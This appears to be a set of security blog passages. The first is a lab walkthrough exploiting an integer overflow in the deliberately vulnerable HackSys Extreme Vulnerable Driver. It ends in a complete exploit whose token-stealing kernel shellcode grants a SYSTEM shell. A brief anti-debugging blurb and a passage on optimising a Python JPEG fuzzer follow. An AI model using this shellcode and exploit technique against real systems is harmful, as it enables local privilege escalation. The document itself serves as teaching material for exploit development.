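void integer_overflow_sketch(PVOID UserBuffer, ULONG Size)
{
    ULONG KernelBuffer[512] = { 0 };    // 0x800 bytes of kernel stack
    ULONG Counter = 0;

    if ((Size + 4) >= 0x800) {          // 0xFFFFFFFF + 4 wraps to 0x3 and passes
        return;                         // "Invalid UserBuffer Size"
    }

    while (Counter < (Size / 4)) {      // but Size itself is still 0xFFFFFFFF here
        if (*(PULONG)UserBuffer == 0xBAD0B0B0) {
            break;                      // terminator DWORD stops the copy
        }
        KernelBuffer[Counter] = *(PULONG)UserBuffer;
        UserBuffer = (PULONG)UserBuffer + 1;
        Counter++;
    }
}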

Manipulating DWORD nInBufferSize

First we’ll send a vanilla payload to test our theories up to this point. Let’s start by sending a buffer full of all \x41 chars and it will be a length of 0x750 (null-terminated). We’ll use the sizeof() - 1 method to form our nInBufferSize parameter and account for the null terminator as well so that everything is accurate and consistent. Our code will look like this at this point:

#include <iostream>
#include <string>
#include <iomanip>

#include <Windows.h>

using namespace std;

#define DEVICE_NAME         "\\\\.\\HackSysExtremeVulnerableDriver"
#define IOCTL               0x222027

HANDLE get_handle() {

    HANDLE hFile = CreateFileA(DEVICE_NAME,
        FILE_READ_ACCESS | FILE_WRITE_ACCESS,
        FILE_SHARE_READ | FILE_SHARE_WRITE,
        NULL,
        OPEN_EXISTING,
        FILE_FLAG_OVERLAPPED | FILE_ATTRIBUTE_NORMAL,
        NULL);

    if (hFile == INVALID_HANDLE_VALUE) {
        cout << "[!] No handle to HackSysExtremeVulnerableDriver.\n";
        exit(1);
    }

    cout << "[>] Handle to HackSysExtremeVulnerableDriver: " << hex << hFile
        << "\n";

    return hFile;
}

void send_payload(HANDLE hFile) {

    

    BYTE input_buff[0x751] = { 0 };

    // 'A' * 1871
    memset(
        input_buff,
        '\x41',
        0x750);

    cout << "[>] Sending buffer of size: " << sizeof(input_buff) - 1  << "\n";

    DWORD bytes_ret = 0x0;

    int result = DeviceIoControl(hFile,
        IOCTL,
        &input_buff,
        sizeof(input_buff) - 1,
        NULL,
        0,
        &bytes_ret,
        NULL);

    if (!result) {
        cout << "[!] Payload failed.\n";
    }
}

int main()
{
    HANDLE hFile = get_handle();

    send_payload(hFile);
}

What are our predictions for this code? What conditions will we hit? The criteria for copying bytes from user buffer to kernel buffer was:

  1. the length of our buffer + 4 is < 0x800,
  2. the Counter variable (edi) is < the length of our buffer divided by 4,
  3. and the 4 byte value in eax is not 0xBAD0B0B0

We should pass the first check since our buffer is indeed small enough. This second check will eventually make us exit the function since our length divided by 4, will eventually be caught by the Counter as it increments every 4 byte copy. We don’t have to worry about the third check as we don’t have this string in our payload. Let’s send it and step through it in WinDBG.

This picture helps us a lot. I’ve set a breakpoint on the comparison between the length of our buffer + 4 and 0x800. As you can see, eax holds 0x754 which is what we would expect since we sent a 0x750 byte buffer.

In the bottom right, we see our user buffer was allocated at 0x0012f184. Let’s set a break on access at 0x0012f8d0 since that is 0x74c away from where we are now, which is 0x4 short of 0x750. If this 4 byte address is accessed for a read-operation we should hit our breakpoint. This will occur when the program goes to copy the 4 byte value here to the kernel buffer.

The syntax is ba r1 0x0012f8d0 which means “break on access if there is a read of at least 1 byte at that address.”

We resume from here, we hit our breakpoint.

Take a look at edi, we can see our counter has incremented 0x1d3 times at this point, which is very close to the length of our buffer (0x750) divided by 0x4 (0x1d4). We can see that right now, we’re comparing the 4 byte value at this address to ecx, or 0xbad0b0b0. We won’t hit that criteria, but on the next iteration our counter will be equal to 0x1d4 and thus, we will be finished copying bytes into the kernel buffer. Everything worked as expected. Now let’s send a fake DWORD nInBufferSize value of 0xFFFFFFFF, watch us sail right through the length check, and see what else we bypass.

Our DeviceIoControl call now looks like this:

int result = DeviceIoControl(hFile,
        IOCTL,
        &input_buff,
        ULONG_MAX,
        NULL,
        0,
        &bytes_ret,
        NULL);

When we hit a breakpoint at the point where we see eax being loaded with our user buffer length + 0x4, we see that right before the arithmetic, we are at a length of 0xffffffff in ebx.

Then after the operation, we see eax rolls over to 0x3.

So we will now pass the length check for sure, which we saw coming. The other really interesting thing that we took note of previously, but can see playing out here, is that ebx has been left undisturbed and still holds 0xffffffff. This is the register used in the arithmetic to determine whether or not the Counter should keep iterating. This value is eventually loaded into eax and divided by 4! 0xFFFFFFFF divided by 4 is 0x3FFFFFFF, over a billion iterations, so the Counter will likely never cause us to exit the function. We will keep copying bytes from the user buffer to the kernel buffer basically forever now.

THIS IS NOT GOOD

Overwriting arbitrary memory in the kernel space is dangerous business. We can’t corrupt anything more than we absolutely have to. We need a way to terminate the copying function. In comes the terminator string of 0xBAD0B0B0 to the rescue. If the 4 byte value in the user buffer is 0xBAD0B0B0, we cease copying and exit the function. Without it, we obviously just BSOD.

So hopefully, we can copy 0x800 bytes, and then start overwriting kernel memory on the stack where we can strategically place a pointer to shellcode. Like I said previously, you don’t want a huge overwrite here. I started at 0x800 and worked my way up 4 bytes at a time using a little pattern creating tool I made here until I got a crash.

Incrementing 4 bytes at a time, I finally got a crash with a 0x830 buffer length where the last 4 bytes are 0xBAD0B0B0.
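For reference, the test buffers during that search were built something like this (the terminator DWORD 0xBAD0B0B0 written in little-endian byte order), which also mirrors what ends up in the final exploit:

// 0x830 total: 0x82C 'A' bytes followed by the 4 byte terminator
BYTE test_buff[0x830] = { 0 };
memset(test_buff, '\x41', 0x82C);

BYTE terminator[] = "\xb0\xb0\xd0\xba";
memcpy(test_buff + 0x82C, &terminator, 0x4);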

Getting a Crash

After incrementing methodically from a buffer size of 0x800, and remember that this includes a 4 byte terminator string or else we’ll never stop copying into kernel space and BSOD the host, I finally got an exception that tried to execute code at 41414141 with a total buffer size of 0x830. (I also got an exception when I used a smaller buffer size of 0x82C but the address referenced was a NULL). In this buffer, I had 0x82C \x41 chars and then our terminator. So I figured our offset was going to be at 0x828 or 2088 in decimal, but just to make sure I used my pattern python script to get the exact offset.

root@kali:~# python3 pattern.py -c 2092 -cpp
char pattern[] = 
"0Aa0Ab0Ac0Ad0Ae0Af0Ag0Ah0Ai0Aj0Ak0Al0Am0An0Ao0Ap0Aq0Ar0As0At0Au0Av0Aw0Ax0Ay0Az"
"0A00A10A20A30A40A50A60A70A80A90AA0AB0AC0AD0AE0AF0AG0AH0AI0AJ0AK0AL0AM0AN0AO0AP"
"0AQ0AR0AS0AT0AU0AV0AW0AX0AY0AZ0Ba0Bb0Bc0Bd0Be0Bf0Bg0Bh0Bi0Bj0Bk0Bl0Bm0Bn0Bo0Bp"
"0Bq0Br0Bs0Bt0Bu0Bv0Bw0Bx0By0Bz0B00B10B20B30B40B50B60B70B80B90BA0BB0BC0BD0BE0BF"
"0BG0BH0BI0BJ0BK0BL0BM0BN0BO0BP0BQ0BR0BS0BT0BU0BV0BW0BX0BY0BZ0Ca0Cb0Cc0Cd0Ce0Cf"
"0Cg0Ch0Ci0Cj0Ck0Cl0Cm0Cn0Co0Cp0Cq0Cr0Cs0Ct0Cu0Cv0Cw0Cx0Cy0Cz0C00C10C20C30C40C5"
"0C60C70C80C90CA0CB0CC0CD0CE0CF0CG0CH0CI0CJ0CK0CL0CM0CN0CO0CP0CQ0CR0CS0CT0CU0CV"
"0CW0CX0CY0CZ0Da0Db0Dc0Dd0De0Df0Dg0Dh0Di0Dj0Dk0Dl0Dm0Dn0Do0Dp0Dq0Dr0Ds0Dt0Du0Dv"
"0Dw0Dx0Dy0Dz0D00D10D20D30D40D50D60D70D80D90DA0DB0DC0DD0DE0DF0DG0DH0DI0DJ0DK0DL"
"0DM0DN0DO0DP0DQ0DR0DS0DT0DU0DV0DW0DX0DY0DZ0Ea0Eb0Ec0Ed0Ee0Ef0Eg0Eh0Ei0Ej0Ek0El"
"0Em0En0Eo0Ep0Eq0Er0Es0Et0Eu0Ev0Ew0Ex0Ey0Ez0E00E10E20E30E40E50E60E70E80E90EA0EB"
"0EC0ED0EE0EF0EG0EH0EI0EJ0EK0EL0EM0EN0EO0EP0EQ0ER0ES0ET0EU0EV0EW0EX0EY0EZ0Fa0Fb"
"0Fc0Fd0Fe0Ff0Fg0Fh0Fi0Fj0Fk0Fl0Fm0Fn0Fo0Fp0Fq0Fr0Fs0Ft0Fu0Fv0Fw0Fx0Fy0Fz0F00F1"
"0F20F30F40F50F60F70F80F90FA0FB0FC0FD0FE0FF0FG0FH0FI0FJ0FK0FL0FM0FN0FO0FP0FQ0FR"
"0FS0FT0FU0FV0FW0FX0FY0FZ0Ga0Gb0Gc0Gd0Ge0Gf0Gg0Gh0Gi0Gj0Gk0Gl0Gm0Gn0Go0Gp0Gq0Gr"
"0Gs0Gt0Gu0Gv0Gw0Gx0Gy0Gz0G00G10G20G30G40G50G60G70G80G90GA0GB0GC0GD0GE0GF0GG0GH"
"0GI0GJ0GK0GL0GM0GN0GO0GP0GQ0GR0GS0GT0GU0GV0GW0GX0GY0GZ0Ha0Hb0Hc0Hd0He0Hf0Hg0Hh"
"0Hi0Hj0Hk0Hl0Hm0Hn0Ho0Hp0Hq0Hr0Hs0Ht0Hu0Hv0Hw0Hx0Hy0Hz0H00H10H20H30H40H50H60H7"
"0H80H90HA0HB0HC0HD0HE0HF0HG0HH0HI0HJ0HK0HL0HM0HN0HO0HP0HQ0HR0HS0HT0HU0HV0HW0HX"
"0HY0HZ0Ia0Ib0Ic0Id0Ie0If0Ig0Ih0Ii0Ij0Ik0Il0Im0In0Io0Ip0Iq0Ir0Is0It0Iu0Iv0Iw0Ix"
"0Iy0Iz0I00I10I20I30I40I50I60I70I80I90IA0IB0IC0ID0IE0IF0IG0IH0II0IJ0IK0IL0IM0IN"
"0IO0IP0IQ0IR0IS0IT0IU0IV0IW0IX0IY0IZ0Ja0Jb0Jc0Jd0Je0Jf0Jg0Jh0Ji0Jj0Jk0Jl0Jm0Jn"
"0Jo0Jp0Jq0Jr0Js0Jt0Ju0Jv0Jw0Jx0Jy0Jz0J00J10J20J30J40J50J60J70J80J90JA0JB0JC0JD"
"0JE0JF0JG0JH0JI0JJ0JK0JL0JM0JN0JO0JP0JQ0JR0JS0JT0JU0JV0JW0JX0JY0JZ0Ka0Kb0Kc0Kd"
"0Ke0Kf0Kg0Kh0Ki0Kj0Kk0Kl0Km0Kn0Ko0Kp0Kq0Kr0Ks0Kt0Ku0Kv0Kw0Kx0Ky0Kz0K00K10K20K3"
"0K40K50K60K70K80K90KA0KB0KC0KD0KE0KF0KG0KH0KI0KJ0KK0KL0KM0KN0KO0KP0KQ0KR0KS0KT"
"0KU0KV0KW0KX0KY0KZ0La0Lb0Lc0Ld0Le0Lf0Lg0Lh0Li0Lj0Lk0Ll0Lm0Ln0Lo0";

I then added the terminator to the end like so.

---SNIP---
...Lm0Ln0Lo0\xb0\xb0\xd0\xba";

And we see I got an access violation at 306f4c30.

Using pattern again, I got the exact offset and we confirmed our suspicions.

root@kali:~# python3 pattern.py -o 306f4c30
Exact offset found at position: 2088

From here on out, this plays out just like the stack buffer overflow posts, so please reference those posts if you have any questions! We initialize our shellcode, create a RWX buffer for it, move it there, and then use the address of the buffer to overwrite eip at that offset we found.

Final Code

#include <iostream>
#include <string>
#include <iomanip>

#include <Windows.h>

using namespace std;

#define DEVICE_NAME         "\\\\.\\HackSysExtremeVulnerableDriver"
#define IOCTL               0x222027

HANDLE get_handle() {

    HANDLE hFile = CreateFileA(DEVICE_NAME,
        FILE_READ_ACCESS | FILE_WRITE_ACCESS,
        FILE_SHARE_READ | FILE_SHARE_WRITE,
        NULL,
        OPEN_EXISTING,
        FILE_FLAG_OVERLAPPED | FILE_ATTRIBUTE_NORMAL,
        NULL);

    if (hFile == INVALID_HANDLE_VALUE) {
        cout << "[!] No handle to HackSysExtremeVulnerableDriver.\n";
        exit(1);
    }

    cout << "[>] Handle to HackSysExtremeVulnerableDriver: " << hex << hFile
        << "\n";

    return hFile;
}

void send_payload(HANDLE hFile) {

    char shellcode[] = (
        "\x60"                          // pushad
        "\x64\xA1\x24\x01\x00\x00"      // mov eax, fs:[0x124] ; current KTHREAD
        "\x8B\x40\x50"                  // mov eax, [eax+0x50] ; current EPROCESS
        "\x89\xC1"                      // mov ecx, eax        ; save our EPROCESS
        "\x8B\x98\xF8\x00\x00\x00"      // mov ebx, [eax+0xF8] ; our Token
        "\xBA\x04\x00\x00\x00"          // mov edx, 4          ; SYSTEM PID
        "\x8B\x80\xB8\x00\x00\x00"      // mov eax, [eax+0xB8] ; ActiveProcessLinks
        "\x2D\xB8\x00\x00\x00"          // sub eax, 0xB8       ; back to EPROCESS base
        "\x39\x90\xB4\x00\x00\x00"      // cmp [eax+0xB4], edx ; UniqueProcessId == 4?
        "\x75\xED"                      // jne                 ; keep walking the list
        "\x8B\x90\xF8\x00\x00\x00"      // mov edx, [eax+0xF8] ; SYSTEM Token
        "\x89\x91\xF8\x00\x00\x00"      // mov [ecx+0xF8], edx ; overwrite our Token
        "\x61"                          // popad
        "\x5d"                          // pop ebp
        "\xc2\x08\x00"                  // ret 8
        );

    LPVOID shellcode_address = VirtualAlloc(NULL,
        sizeof(shellcode),
        MEM_RESERVE | MEM_COMMIT,
        PAGE_EXECUTE_READWRITE);

    memcpy(shellcode_address, shellcode, sizeof(shellcode));

    cout << "[>] RWX shellcode allocated at: " << hex << shellcode_address
        << "\n";

    BYTE input_buff[0x830] = { 0 };

    // 'A' * 0x828
    memset(input_buff, '\x41', 0x828);

    memcpy(input_buff + 0x828, &shellcode_address, 0x4);

    BYTE terminator[] = "\xb0\xb0\xd0\xba";

    memcpy(input_buff + 0x82c, &terminator, 0x4);

    cout << "[>] Sending buffer of size: " << sizeof(input_buff) << "\n";

    DWORD bytes_ret = 0x0;

    int result = DeviceIoControl(hFile,
        IOCTL,
        &input_buff,
        ULONG_MAX,
        NULL,
        0,
        &bytes_ret,
        NULL);

    if (!result) {
        cout << "[!] Payload failed.\n";
    }
}

void spawn_shell()
{
    PROCESS_INFORMATION Process_Info;
    ZeroMemory(&Process_Info, 
        sizeof(Process_Info));
    
    STARTUPINFOA Startup_Info;
    ZeroMemory(&Startup_Info, 
        sizeof(Startup_Info));
    
    Startup_Info.cb = sizeof(Startup_Info);

    CreateProcessA("C:\\Windows\\System32\\cmd.exe",
        NULL, 
        NULL, 
        NULL, 
        0, 
        CREATE_NEW_CONSOLE, 
        NULL, 
        NULL, 
        &Startup_Info, 
        &Process_Info);
}

int main()
{
    HANDLE hFile = get_handle();

    send_payload(hFile);

    spawn_shell();
}

Conclusion

This should net you a system shell.

The universal antidebugger, x64 revamped

10 April 2020 at 00:00
A single step for a debugger, a giant leap for the obfuscator. When a debugger hits a breakpoint, it can perform single-stepping into the subsequent instructions by halting itself each time. To do so, it uses a specially crafted flag called the Trap Flag (TF), residing at bit position 8 inside the EFLAGS x86 register. If the Trap Flag is enabled, the processor then triggers an interrupt after each instruction has been executed.

Fuzzing Like A Caveman 2: Improving Performance

By: h0mbre
8 April 2020 at 04:00

Introduction

In this episode of ‘Fuzzing like a Caveman’ we’ll just be looking at improving the performance of our previous fuzzer. This means there won’t be any wholesale changes, we’re simply looking to improve upon what we already had in the previous post. This means we’ll still end up walking away from this blogpost with a very basic mutation fuzzer (please let it be faster!!) and hopefully some more bugs on a different target. We won’t really tinker with multi-threading or multi-processing in this post, we will save that for subsequent fuzzing posts.

I feel the need to add a DISCLAIMER here that I am not a professional developer, far from it. I’m simply not experienced enough with programming at this point to recognize opportunities to improve performance the way a more seasoned programmer would. I’m going to use my crude skillset and my limited knowledge of programming to improve our previous fuzzer, that’s it. The code produced will not be pretty, it will not be perfect, but it will be better than what we had in the previous post. It should also be mentioned that all testing was done on VMWare Workstation on an x86 Kali VM with 1 CPU and 1 Core.

Let’s take a moment to define ‘better’ in the context of this blog post as well. What I mean by ‘better’ here is that we can iterate through n fuzzing iterations faster, that’s it. We’ll take the time to completely rewrite the fuzzer, use a cool language, pick a hardened target, and employ more advanced fuzzing techniques at a later date. :)

Obviously, if you haven’t read the previous post you will be LOST!

Analyzing Our Fuzzer

Our last fuzzer, quite plainly, worked! We found some bugs in our target. But we knew we left some optimizations on the table when we turned in our homework. Let’s again look at the fuzzer from the last post (with minor changes for testing purposes):

#!/usr/bin/env python3

import sys
import random
from pexpect import run
from pipes import quote

# read bytes from our valid JPEG and return them in a mutable bytearray 
def get_bytes(filename):

	f = open(filename, "rb").read()

	return bytearray(f)

def bit_flip(data):

	num_of_flips = int((len(data) - 4) * .01)

	indexes = range(4, (len(data) - 4))

	chosen_indexes = []

	# iterate selecting indexes until we've hit our num_of_flips number
	counter = 0
	while counter < num_of_flips:
		chosen_indexes.append(random.choice(indexes))
		counter += 1

	for x in chosen_indexes:
		current = data[x]
		current = (bin(current).replace("0b",""))
		current = "0" * (8 - len(current)) + current
		
		indexes = range(0,8)

		picked_index = random.choice(indexes)

		new_number = []

		# our new_number list now has all the digits, example: ['1', '0', '1', '0', '1', '0', '1', '0']
		for i in current:
			new_number.append(i)

		# if the number at our randomly selected index is a 1, make it a 0, and vice versa
		if new_number[picked_index] == "1":
			new_number[picked_index] = "0"
		else:
			new_number[picked_index] = "1"

		# create our new binary string of our bit-flipped number
		current = ''
		for i in new_number:
			current += i

		# convert that string to an integer
		current = int(current,2)

		# change the number in our byte array to our new number we just constructed
		data[x] = current

	return data

def magic(data):

	magic_vals = [
	(1, 255),
	(1, 255),
	(1, 127),
	(1, 0),
	(2, 255),
	(2, 0),
	(4, 255),
	(4, 0),
	(4, 128),
	(4, 64),
	(4, 127)
	]

	picked_magic = random.choice(magic_vals)

	length = len(data) - 8
	index = range(0, length)
	picked_index = random.choice(index)

	# here we are hardcoding all the byte overwrites for all of the tuples that begin (1, )
	if picked_magic[0] == 1:
		if picked_magic[1] == 255:			# 0xFF
			data[picked_index] = 255
		elif picked_magic[1] == 127:		# 0x7F
			data[picked_index] = 127
		elif picked_magic[1] == 0:			# 0x00
			data[picked_index] = 0

	# here we are hardcoding all the byte overwrites for all of the tuples that begin (2, )
	elif picked_magic[0] == 2:
		if picked_magic[1] == 255:			# 0xFFFF
			data[picked_index] = 255
			data[picked_index + 1] = 255
		elif picked_magic[1] == 0:			# 0x0000
			data[picked_index] = 0
			data[picked_index + 1] = 0

	# here we are hardcoding all of the byte overwrites for all of the tuples that being (4, )
	elif picked_magic[0] == 4:
		if picked_magic[1] == 255:			# 0xFFFFFFFF
			data[picked_index] = 255
			data[picked_index + 1] = 255
			data[picked_index + 2] = 255
			data[picked_index + 3] = 255
		elif picked_magic[1] == 0:			# 0x00000000
			data[picked_index] = 0
			data[picked_index + 1] = 0
			data[picked_index + 2] = 0
			data[picked_index + 3] = 0
		elif picked_magic[1] == 128:		# 0x80000000
			data[picked_index] = 128
			data[picked_index + 1] = 0
			data[picked_index + 2] = 0
			data[picked_index + 3] = 0
		elif picked_magic[1] == 64:			# 0x40000000
			data[picked_index] = 64
			data[picked_index + 1] = 0
			data[picked_index + 2] = 0
			data[picked_index + 3] = 0
		elif picked_magic[1] == 127:		# 0x7FFFFFFF
			data[picked_index] = 127
			data[picked_index + 1] = 255
			data[picked_index + 2] = 255
			data[picked_index + 3] = 255
		
	return data

# create new jpg with mutated data
def create_new(data):

	f = open("mutated.jpg", "wb+")
	f.write(data)
	f.close()

def exif(counter,data):

    command = "exif mutated.jpg -verbose"

    out, returncode = run("sh -c " + quote(command), withexitstatus=1)

    if b"Segmentation" in out:
    	f = open("crashes2/crash.{}.jpg".format(str(counter)), "ab+")
    	f.write(data)
    	print("Segfault!")

    #if counter % 100 == 0:
    #	print(counter, end="\r")

if len(sys.argv) < 2:
	print("Usage: JPEGfuzz.py <valid_jpg>")

else:
	filename = sys.argv[1]
	counter = 0
	while counter < 1000:
		data = get_bytes(filename)
		functions = [0, 1]
		picked_function = random.choice(functions)
		picked_function = 1
		if picked_function == 0:
			mutated = magic(data)
			create_new(mutated)
			exif(counter,mutated)
		else:
			mutated = bit_flip(data)
			create_new(mutated)
			exif(counter,mutated)

		counter += 1

You may notice a few changes. We’ve:

  • commented out the print statement for the iterations counter every 100 iterations,
  • added print statements to notify us of any Segfaults,
  • hardcoded 1k iterations,
  • added this line: picked_function = 1 temporarily so that we eliminate any randomness in our testing and we only stick to one mutation method (bit_flip())

Let’s run this version of our fuzzer with some profiling instrumentation and we can really analyze how much time we spend where in our program’s execution.

We can make use of the cProfile Python module and see where we spend our time during 1,000 fuzzing iterations. The program takes a filepath argument to a valid JPEG file if you remember, so our complete command line syntax will be: python3 -m cProfile -s cumtime JPEGfuzzer.py ~/jpegs/Canon_40D.jpg.

It should also be noted that adding this cProfile instrumentation could slow down performance. I tested without it and for the iteration sizes we use in this post, it didn’t seem to make a significant difference.

After letting this run, we see our program output and we get to see where we spent the most time during execution.

2476093 function calls (2474812 primitive calls) in 122.084 seconds

   Ordered by: cumulative time

   ncalls  tottime  percall  cumtime  percall filename:lineno(function)
     33/1    0.000    0.000  122.084  122.084 {built-in method builtins.exec}
        1    0.108    0.108  122.084  122.084 blog.py:3(<module>)
     1000    0.090    0.000  118.622    0.119 blog.py:140(exif)
     1000    0.080    0.000  118.452    0.118 run.py:7(run)
     5432  103.761    0.019  103.761    0.019 {built-in method time.sleep}
     1000    0.028    0.000  100.923    0.101 pty_spawn.py:316(close)
     1000    0.025    0.000  100.816    0.101 ptyprocess.py:387(close)
     1000    0.061    0.000    9.949    0.010 pty_spawn.py:36(__init__)
     1000    0.074    0.000    9.764    0.010 pty_spawn.py:239(_spawn)
     1000    0.041    0.000    8.682    0.009 pty_spawn.py:312(_spawnpty)
     1000    0.266    0.000    8.641    0.009 ptyprocess.py:178(spawn)
     1000    0.011    0.000    7.491    0.007 spawnbase.py:240(expect)
     1000    0.036    0.000    7.479    0.007 spawnbase.py:343(expect_list)
     1000    0.128    0.000    7.409    0.007 expect.py:91(expect_loop)
     6432    6.473    0.001    6.473    0.001 {built-in method posix.read}
     5432    0.089    0.000    3.818    0.001 pty_spawn.py:415(read_nonblocking)
     7348    0.029    0.000    3.162    0.000 utils.py:130(select_ignore_interrupts)
     7348    3.127    0.000    3.127    0.000 {built-in method select.select}
     1000    0.790    0.001    1.777    0.002 blog.py:15(bit_flip)
     1000    0.015    0.000    1.311    0.001 blog.py:134(create_new)
     1000    0.100    0.000    1.101    0.001 pty.py:79(fork)
     1000    1.000    0.001    1.000    0.001 {built-in method posix.forkpty}
-----SNIP-----

For this type of analysis, we don’t really care about how many segfaults we had since we’re not really tinkering much with the mutation methods or comparing different methods. Granted there will be some randomness here, as a crash would necessitate extra processing, but this will do for now.

I snipped only the sections of code where we spent more than 1.0 seconds cumulatively. You can see we spent by far the most time in blog.py:140(exif). A whopping 118 seconds out of 122 seconds total. Our exif() function seems to be a major problem in our performance.

We can see that most of the time we spent underneath that function was directly related to the function, we see plenty of appeals to the pty module from our pexpect usage. Let’s rewrite our function using Popen from the subprocess module and see if we can improve performance here!

Here is our redefined exif() function:

def exif(counter,data):

    # note: this version needs 'from subprocess import Popen, PIPE' in the imports
    p = Popen(["exif", "mutated.jpg", "-verbose"], stdout=PIPE, stderr=PIPE)
    (out,err) = p.communicate()

    if p.returncode == -11:
    	f = open("crashes2/crash.{}.jpg".format(str(counter)), "ab+")
    	f.write(data)
    	print("Segfault!")

    #if counter % 100 == 0:
    #	print(counter, end="\r")

Here is our performance report:

2065580 function calls (2065443 primitive calls) in 2.756 seconds

   Ordered by: cumulative time

   ncalls  tottime  percall  cumtime  percall filename:lineno(function)
     15/1    0.000    0.000    2.756    2.756 {built-in method builtins.exec}
        1    0.038    0.038    2.756    2.756 subpro.py:3(<module>)
     1000    0.020    0.000    1.917    0.002 subpro.py:139(exif)
     1000    0.026    0.000    1.121    0.001 subprocess.py:681(__init__)
     1000    0.099    0.000    1.045    0.001 subprocess.py:1412(_execute_child)
 -----SNIP-----

What a difference. This fuzzer, with the redefined exif() function performed the same amount of work in only 2 seconds!! That’s insane! The old fuzzer: 122 seconds, new fuzzer: 2.7 seconds.

Improving Further in Python

Let’s try to continue improving our fuzzer all within Python. First, let’s get a good benchmark for us to perform against. We’ll get our optimized Python fuzzer to iterate through 50,000 fuzzing iterations and we’ll use the cProfile module again to get some fine-grained statistics about where we spend our time.

102981395 function calls (102981258 primitive calls) in 141.488 seconds

   Ordered by: cumulative time

   ncalls  tottime  percall  cumtime  percall filename:lineno(function)
     15/1    0.000    0.000  141.488  141.488 {built-in method builtins.exec}
        1    1.724    1.724  141.488  141.488 subpro.py:3(<module>)
    50000    0.992    0.000  102.588    0.002 subpro.py:139(exif)
    50000    1.248    0.000   61.562    0.001 subprocess.py:681(__init__)
    50000    5.034    0.000   57.826    0.001 subprocess.py:1412(_execute_child)
    50000    0.437    0.000   39.586    0.001 subprocess.py:920(communicate)
    50000    2.527    0.000   39.064    0.001 subprocess.py:1662(_communicate)
   208254   37.508    0.000   37.508    0.000 {built-in method posix.read}
   158238    0.577    0.000   28.809    0.000 selectors.py:402(select)
   158238   28.131    0.000   28.131    0.000 {method 'poll' of 'select.poll' objects}
    50000   11.784    0.000   25.819    0.001 subpro.py:14(bit_flip)
  7950000    3.666    0.000   10.431    0.000 random.py:256(choice)
    50000    8.421    0.000    8.421    0.000 {built-in method _posixsubprocess.fork_exec}
    50000    0.162    0.000    7.358    0.000 subpro.py:133(create_new)
  7950000    4.096    0.000    6.130    0.000 random.py:224(_randbelow)
   203090    5.016    0.000    5.016    0.000 {built-in method io.open}
    50000    4.211    0.000    4.211    0.000 {method 'close' of '_io.BufferedRandom' objects}
    50000    1.643    0.000    4.194    0.000 os.py:617(get_exec_path)
    50000    1.733    0.000    3.356    0.000 subpro.py:8(get_bytes)
 35866791    2.635    0.000    2.635    0.000 {method 'append' of 'list' objects}
   100000    0.070    0.000    1.960    0.000 subprocess.py:1014(wait)
   100000    0.252    0.000    1.902    0.000 selectors.py:351(register)
   100000    0.444    0.000    1.890    0.000 subprocess.py:1621(_wait)
   100000    0.675    0.000    1.583    0.000 selectors.py:234(register)
   350000    0.432    0.000    1.501    0.000 subprocess.py:1471(<genexpr>)
 12074141    1.434    0.000    1.434    0.000 {method 'getrandbits' of '_random.Random' objects}
    50000    0.059    0.000    1.358    0.000 subprocess.py:1608(_try_wait)
    50000    1.299    0.000    1.299    0.000 {built-in method posix.waitpid}
   100000    0.488    0.000    1.058    0.000 os.py:674(__getitem__)
   100000    1.017    0.000    1.017    0.000 {method 'close' of '_io.BufferedReader' objects}
-----SNIP-----

50,000 iterations took us a grand total of 141 seconds, this is great performance compared to what we were dealing with. We previously took 122 seconds to do 1,000 iterations! Once again filtering on only time where we spent over 1.0 seconds, we see that we again spent most of our time in exif() but we also see some performance issues in bit_flip() as we spent 25 cumulative seconds there. Let’s try to optimize that function a bit.

Let’s go ahead and repost what the old bit_flip() function looked like:

def bit_flip(data):

	num_of_flips = int((len(data) - 4) * .01)

	indexes = range(4, (len(data) - 4))

	chosen_indexes = []

	# iterate selecting indexes until we've hit our num_of_flips number
	counter = 0
	while counter < num_of_flips:
		chosen_indexes.append(random.choice(indexes))
		counter += 1

	for x in chosen_indexes:
		current = data[x]
		current = (bin(current).replace("0b",""))
		current = "0" * (8 - len(current)) + current
		
		indexes = range(0,8)

		picked_index = random.choice(indexes)

		new_number = []

		# our new_number list now has all the digits, example: ['1', '0', '1', '0', '1', '0', '1', '0']
		for i in current:
			new_number.append(i)

		# if the number at our randomly selected index is a 1, make it a 0, and vice versa
		if new_number[picked_index] == "1":
			new_number[picked_index] = "0"
		else:
			new_number[picked_index] = "1"

		# create our new binary string of our bit-flipped number
		current = ''
		for i in new_number:
			current += i

		# convert that string to an integer
		current = int(current,2)

		# change the number in our byte array to our new number we just constructed
		data[x] = current

	return data

This function is admittedly a bit clumsy. We can simplify it greatly by utilizing better logic. I find this is often the case with programming in my limited experience, you can have all of the fancy esoteric programming knowledge you want, but if the logic behind your program is unsound, then the program’s performance will suffer.

Let’s reduce the amount of type conversions we do, for instance ints to str or vice versa, and let’s just get less code into our editor. We can accomplish what we want with a re-defined bit_flip() function as follows:

def bit_flip(data):

	length = len(data) - 4

	num_of_flips = int(length * .01)

	picked_indexes = []
	
	flip_array = [1,2,4,8,16,32,64,128]

	counter = 0
	while counter < num_of_flips:
		picked_indexes.append(random.choice(range(0,length)))
		counter += 1


	for x in picked_indexes:
		mask = random.choice(flip_array)
		data[x] = data[x] ^ mask

	return data

If we employ this new function and monitor the results, we get a performance grade of:

59376275 function calls (59376138 primitive calls) in 135.582 seconds

   Ordered by: cumulative time

   ncalls  tottime  percall  cumtime  percall filename:lineno(function)
     15/1    0.000    0.000  135.582  135.582 {built-in method builtins.exec}
        1    1.940    1.940  135.582  135.582 subpro.py:3(<module>)
    50000    0.978    0.000  107.857    0.002 subpro.py:111(exif)
    50000    1.450    0.000   64.236    0.001 subprocess.py:681(__init__)
    50000    5.566    0.000   60.141    0.001 subprocess.py:1412(_execute_child)
    50000    0.534    0.000   42.259    0.001 subprocess.py:920(communicate)
    50000    2.827    0.000   41.637    0.001 subprocess.py:1662(_communicate)
   199549   38.249    0.000   38.249    0.000 {built-in method posix.read}
   149537    0.555    0.000   30.376    0.000 selectors.py:402(select)
   149537   29.722    0.000   29.722    0.000 {method 'poll' of 'select.poll' objects}
    50000    3.993    0.000   14.471    0.000 subpro.py:14(bit_flip)
  7950000    3.741    0.000   10.316    0.000 random.py:256(choice)
    50000    9.973    0.000    9.973    0.000 {built-in method _posixsubprocess.fork_exec}
    50000    0.163    0.000    7.034    0.000 subpro.py:105(create_new)
  7950000    3.987    0.000    5.952    0.000 random.py:224(_randbelow)
   202567    4.966    0.000    4.966    0.000 {built-in method io.open}
    50000    4.042    0.000    4.042    0.000 {method 'close' of '_io.BufferedRandom' objects}
    50000    1.539    0.000    3.828    0.000 os.py:617(get_exec_path)
    50000    1.843    0.000    3.607    0.000 subpro.py:8(get_bytes)
